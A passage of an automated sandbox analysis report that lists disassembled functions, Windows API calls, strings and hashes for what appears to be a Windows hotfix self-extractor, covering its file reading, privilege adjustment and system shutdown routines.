                                                                                              • Opcode Fuzzy Hash: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
                                                                                              • Instruction Fuzzy Hash: 7CF0B431500385AEFB334F29C804BAABFD89F91751F28809DFAC4CA582D7B58590C7A5
                                                                                              Function 01003C58 Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 797 1003c58-1003c74 ReadFile 798 1003c76-1003c78 call 1003892 797->798 799 1003c7d-1003c81 797->799 798->799
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 01003C6C
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteErrorExitFileLastLoadMessageProcessReadSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 896096512-0
                                                                                              • Opcode ID: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
                                                                                              • Instruction ID: b5e608f67cd8aa0ec7224ba8d194bf05f248ddf814a44386e79e7048d07bb6a0
                                                                                              • Opcode Fuzzy Hash: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
                                                                                              • Instruction Fuzzy Hash: EED0173210034DBFDF129E95CC08EAA3B6DFF44220F084514BA7889090D732D520CB51
                                                                                              Function 01002C7C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 01002C9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
                                                                                              • Instruction ID: 4670c305a0b7d71b77fc1b6fc64dcd010d39b6e931a86f05cad5b7c8d19ffb63
                                                                                              • Opcode Fuzzy Hash: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
                                                                                              • Instruction Fuzzy Hash: 8CD01731100208AFEB22CF48DD09FAA7BA9FB40314F058254F99C86195C776A9A4DB80
                                                                                              Function 01003BE7 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?), ref: 01003BF7
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCriticalDeleteErrorExitHeapLastLoadMessageProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 2723237252-0
                                                                                              • Opcode ID: d29ed06aef175119988cce3a01b5eac88403f80cc4c048d63e3ca06fa13aed40
                                                                                              • Instruction ID: ad55088b63a8ad1721269f3b50eb0db26e9cccda6a3b5370c978a76dbeb461c3
                                                                                              • Opcode Fuzzy Hash: d29ed06aef175119988cce3a01b5eac88403f80cc4c048d63e3ca06fa13aed40
                                                                                              • Instruction Fuzzy Hash: E4C012311803087BFA631BAAAC09F553F59B790651F04C051F68C4C090DA62A4555750
                                                                                              Function 01003941 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DialogBoxParamA.USER32(00000064,00000000,01002E53,00000000), ref: 01003952
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteDialogErrorExitLastLoadMessageParamProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 372479490-0
                                                                                              • Opcode ID: 15e03c84a8a15e18858af6215931239894f471006d1615df1c756c50269ef313
                                                                                              • Instruction ID: a510406ee53e3107ecf5958c8e1665ca229ba3e50066fc7eea34c27700789f19
                                                                                              • Opcode Fuzzy Hash: 15e03c84a8a15e18858af6215931239894f471006d1615df1c756c50269ef313
                                                                                              • Instruction Fuzzy Hash: 18D01231280340AAF6335724AE0AF5237A07720B2AF24839173E17C0D4C6EA4820CB68

                                                                                              Non-executed Functions

                                                                                              Function 01003972 Relevance: 49.2, APIs: 20, Strings: 8, Instructions: 178synchronizationlibraryshutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenEventA.KERNEL32(00100000,00000000,WFP_IDLE_TRIGGER), ref: 010039AD
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
                                                                                                • Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE
                                                                                              • WaitForSingleObject.KERNEL32(00000000,0000EA60,Shutdown Initiated in Self Extractor ), ref: 010039C9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 010039D0
                                                                                              • Sleep.KERNEL32(00002710,Shutdown Initiated in Self Extractor ), ref: 010039E9
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01003A1F
                                                                                              • GetProcAddress.KERNEL32(00000000,InitiateSystemShutdownExA), ref: 01003A35
                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 01003A48
                                                                                              • InitiateSystemShutdownA.ADVAPI32(00000000,00000000,00000000,?,?), ref: 01003A8B
                                                                                              • GetLastError.KERNEL32 ref: 01003A9B
                                                                                              • WaitForSingleObject.KERNEL32(00000BB8), ref: 01003ABB
                                                                                              • GetLastError.KERNEL32 ref: 01003ACD
                                                                                              • GetVersionExA.KERNEL32(?,?), ref: 01003B0C
                                                                                              • GetVersionExA.KERNEL32(00000094), ref: 01003B2C
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01003B43
                                                                                              • strchr.MSVCRT ref: 01003B56
                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,02000000,00000000), ref: 01003B78
                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 01003B86
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01003B8F
                                                                                              • NtShutdownSystem.NTDLL ref: 01003B9B
                                                                                              • FreeLibrary.KERNEL32(?), ref: 01003BB2
                                                                                              Strings
                                                                                              • ShutdownSystem: Failed , xrefs: 01003BC8
                                                                                              • InitiateSystemShutdown() Failed with error 0x%lx , xrefs: 01003AD0
                                                                                              • InitiateSystemShutdownExA, xrefs: 01003A2F
                                                                                              • advapi32.dll, xrefs: 01003A1A
                                                                                              • Failed to Adjust ENABLE_PRIVILEGE , xrefs: 01003A09
                                                                                              • @, xrefs: 01003B2E
                                                                                              • Shutdown Initiated in Self Extractor , xrefs: 010039B3
                                                                                              • WFP_IDLE_TRIGGER, xrefs: 01003984
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$FileObjectSingleSystemWait$CreateErrorLastLibraryShutdownVersion$AddressBuffersDirectoryEventFlushFreeInitiateLoadOpenProcSleepstrchr
                                                                                              • String ID: @$Failed to Adjust ENABLE_PRIVILEGE $InitiateSystemShutdown() Failed with error 0x%lx $InitiateSystemShutdownExA$Shutdown Initiated in Self Extractor $ShutdownSystem: Failed $WFP_IDLE_TRIGGER$advapi32.dll
                                                                                              • API String ID: 2638087656-3676156507
                                                                                              • Opcode ID: 7a1c7a1b907803973f12d1bf947b1ffc3077485c6b2b2eb9657761a4e00d1aa0
                                                                                              • Instruction ID: ea525c0ef0f58f0b04cd7f7f13f08e90f611286073571a1279888c73dc215274
                                                                                              • Opcode Fuzzy Hash: 7a1c7a1b907803973f12d1bf947b1ffc3077485c6b2b2eb9657761a4e00d1aa0
                                                                                              • Instruction Fuzzy Hash: D4517275900219AFFB73AB64DC8DEDE7BB9BB05304F0101A5F6C9AA081DB758A808B51
                                                                                              Function 0100358B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 010035A1
                                                                                              • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 010035C1
                                                                                              • NtClose.NTDLL ref: 010035CE
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
                                                                                                • Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE
                                                                                              Strings
                                                                                              • RestorePrivilege(): Failed To Restore Privilege , xrefs: 010035D9
                                                                                              • RestorePrivilege():Failed To Open Process Token, xrefs: 010035AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$HandleToken$AdjustCreateFileOpenPrivilegesProcess
                                                                                              • String ID: RestorePrivilege(): Failed To Restore Privilege $RestorePrivilege():Failed To Open Process Token
                                                                                              • API String ID: 1340415033-792189412
                                                                                              • Opcode ID: b8a0502ae2661f499545ef8694a518087c712bcdc019db68534c528b41fb345f
                                                                                              • Instruction ID: 6003aa7cc984a04d304c8d02ce76eb40705ba2f6e4c4443cd9f7ac574e901191
                                                                                              • Opcode Fuzzy Hash: b8a0502ae2661f499545ef8694a518087c712bcdc019db68534c528b41fb345f
                                                                                              • Instruction Fuzzy Hash: DAF06235101119FFEB636BA28E0EDDF7EACEF16655F114020B695980A0D732CB00E7A1
                                                                                              Function 010034F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 0100352E
                                                                                              • NtAdjustPrivilegesToken.NTDLL(?,00000000,00000000,00000000,00000000,?), ref: 01003561
                                                                                              • NtClose.NTDLL ref: 0100356E
                                                                                              • NtClose.NTDLL ref: 01003579
                                                                                              Strings
                                                                                              • NtOpenProcessToken Failed , xrefs: 01003538
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseToken$AdjustOpenPrivilegesProcess
                                                                                              • String ID: NtOpenProcessToken Failed
                                                                                              • API String ID: 2239692276-916547032
                                                                                              • Opcode ID: a2bb500f86ff3c270a923705cdf631df0a80daa1bbf9043a241c06063efd5071
                                                                                              • Instruction ID: 86087f3b1aaf02d6297fc597292e47099355ceb0a226902c4fcc6e84a4753d95
                                                                                              • Opcode Fuzzy Hash: a2bb500f86ff3c270a923705cdf631df0a80daa1bbf9043a241c06063efd5071
                                                                                              • Instruction Fuzzy Hash: E311A07590010AAFEB13DFA8C908BEE7BA8FB04305F008125B9A5DE090D372D5009B91
                                                                                              Function 010062FF Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 010063CE
                                                                                              • UnhandledExceptionFilter.KERNEL32(010025D8), ref: 010063D9
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 010063EA
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 010063F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 3231755760-0
                                                                                              • Opcode ID: 4382b4dedff7cdd383e5e3d049ffc534270b9df7dca4059a9d9760ad3e466a85
                                                                                              • Instruction ID: 79cc3565e310fce42bdb6c08305b060dbc1bc5133d3f3caeb000c08a82c4a438
                                                                                              • Opcode Fuzzy Hash: 4382b4dedff7cdd383e5e3d049ffc534270b9df7dca4059a9d9760ad3e466a85
                                                                                              • Instruction Fuzzy Hash: 6C2102B4804200DBF727CF69E2586947BB0FB4A300F50839AF18987398E77A0585CF45
                                                                                              Function 01008906 Relevance: .3, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cdeacfce3809adc947609343e590c714e8a037b83f6e872e5a04b82d6d4fe78
                                                                                              • Instruction ID: 5536dabd8291dbeda9af35510c629b429d179083cdfcac66a6f3fcb092366832
                                                                                              • Opcode Fuzzy Hash: 7cdeacfce3809adc947609343e590c714e8a037b83f6e872e5a04b82d6d4fe78
                                                                                              • Instruction Fuzzy Hash: 40C18531D096999BEB0BCF68C0947EDBFB0BF05314F18C5AAC8D6AB682D3755585CB80
                                                                                              Function 01008CC5 Relevance: .3, Instructions: 294COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 79354d64886fc410c0814f504bfd9b30afd0e7d4cac24f3c7e689a98db7d4def
                                                                                              • Instruction ID: 05c12d547ef16d3076343c8037f92f088cfa72b28578ee7f0be467a9befaacce
                                                                                              • Opcode Fuzzy Hash: 79354d64886fc410c0814f504bfd9b30afd0e7d4cac24f3c7e689a98db7d4def
                                                                                              • Instruction Fuzzy Hash: 9BC196319086959FDB0BCF68C0946EDBBB0BF05314F19C6AED9D56B282D7709A85CB80
                                                                                              Function 01008286 Relevance: .3, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d4f3ed40784cb1acd205159c057e8a6439da72c959da14e5084bb7fb85de03f
                                                                                              • Instruction ID: 73eb1ad3db2b6007352114fa4a889570cc0f90ca5fb72025f5fa2ea13681cd0c
                                                                                              • Opcode Fuzzy Hash: 2d4f3ed40784cb1acd205159c057e8a6439da72c959da14e5084bb7fb85de03f
                                                                                              • Instruction Fuzzy Hash: 24A19031D082959FDB0ACF58C0942EDFBB1BF45314F59C2EEC9866B282C7715A85CB80
                                                                                              Function 0100859D Relevance: .3, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f84ed33e04a50cc75d73480d86f3b8f11bbc8851e627dfa954f843364c247
                                                                                              • Instruction ID: 47a47e7724101b81cf1e1fdd9477815481a0082b8eb6285e44efc0e7966f3570
                                                                                              • Opcode Fuzzy Hash: 3d9f84ed33e04a50cc75d73480d86f3b8f11bbc8851e627dfa954f843364c247
                                                                                              • Instruction Fuzzy Hash: 24B1A735D082959FDB0BCF18C4946EDBBB0BF45310F19C6AFD8969B286C7709685CB90
                                                                                              Function 0100911E Relevance: .2, Instructions: 230COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3974dae9ebb7a8bc4aa2b7da6efc4464a47bfbc8cab31630611c404ab64ff985
                                                                                              • Instruction ID: 734c5ffc2d1f5eaf6f1fdea0ab5366f13342bdfd70bcbe669edc26b63f45a8e5
                                                                                              • Opcode Fuzzy Hash: 3974dae9ebb7a8bc4aa2b7da6efc4464a47bfbc8cab31630611c404ab64ff985
                                                                                              • Instruction Fuzzy Hash: 8F910630A0459A9EEB1BDF58C8887FEB3B1BB44708F5080AED98D961C2C7749985CF90
                                                                                              Function 01009558 Relevance: .2, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc727b130d8a70c901193652c7c29f7f7098ede988ec518b009589487b1a216
                                                                                              • Instruction ID: 4a48d19044e3ec236ddfe2700c74ad1dffc8538b678a9b9864d77caf5e4adf83
                                                                                              • Opcode Fuzzy Hash: adc727b130d8a70c901193652c7c29f7f7098ede988ec518b009589487b1a216
                                                                                              • Instruction Fuzzy Hash: 23610531A0055A8FEF1ACF6CC4905BEB7A2EBC9344F15856DD9DAD7382DA309952CB80
                                                                                              Function 01003E7A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 125windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringA.USER32(20000005,?,00000104), ref: 01003EEA
                                                                                              • SHBrowseForFolderA.SHELL32(?), ref: 01003F2B
                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 01003F3D
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,?), ref: 01003F54
                                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 01003F5F
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000D,00000104,?), ref: 01003F84
                                                                                              • LoadStringA.USER32(20000005,?,00000104), ref: 01003FB0
                                                                                              • SendMessageA.USER32(?,0000000C,00000000,?), ref: 01003FC3
                                                                                              • SendDlgItemMessageA.USER32(?,00000067,0000000C,00000000,?), ref: 01003FDC
                                                                                              • SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,c:\36a8a8e2fed651ec27d1eed188bb35), ref: 01003FE9
                                                                                              • EndDialog.USER32(?,00000000), ref: 01003FF0
                                                                                              Strings
                                                                                              • c:\36a8a8e2fed651ec27d1eed188bb35, xrefs: 01003FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$LoadString$BrowseDialogFolderFromListPath
                                                                                              • String ID: c:\36a8a8e2fed651ec27d1eed188bb35
                                                                                              • API String ID: 4196404735-3080256118
                                                                                              • Opcode ID: 8ff38ef0283e2243d984189d5b9706cb04c242c77a24033a99f4f0c10035e197
                                                                                              • Instruction ID: ca6d105f0d69831a8513d52e48f8c2b8b825066bcb4f2ed050d46bdd4aedea35
                                                                                              • Opcode Fuzzy Hash: 8ff38ef0283e2243d984189d5b9706cb04c242c77a24033a99f4f0c10035e197
                                                                                              • Instruction Fuzzy Hash: 1F416A75504219BEFB63DB649C8DFEE7BB8EB18300F0041A5B6C5E60C0DAB59A858F60
                                                                                              Function 01002E53 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetParent.USER32(?,000000FD), ref: 01002E8C
                                                                                              • Sleep.KERNEL32(000001F4), ref: 01002E9C
                                                                                              • SetEvent.KERNEL32 ref: 01002EA8
                                                                                              • SetEvent.KERNEL32 ref: 01002EBD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,Global\HotfixNoShutDown), ref: 01002ECC
                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01002EEF
                                                                                              • CloseHandle.KERNEL32(?), ref: 01002EF8
                                                                                              • TerminateProcess.KERNEL32(00000320,00000001), ref: 01002F0F
                                                                                              • EndDialog.USER32(?,00000000), ref: 01002F27
                                                                                              Strings
                                                                                              • Global\HotfixNoShutDown, xrefs: 01002EC3
                                                                                              Memory Dump Source
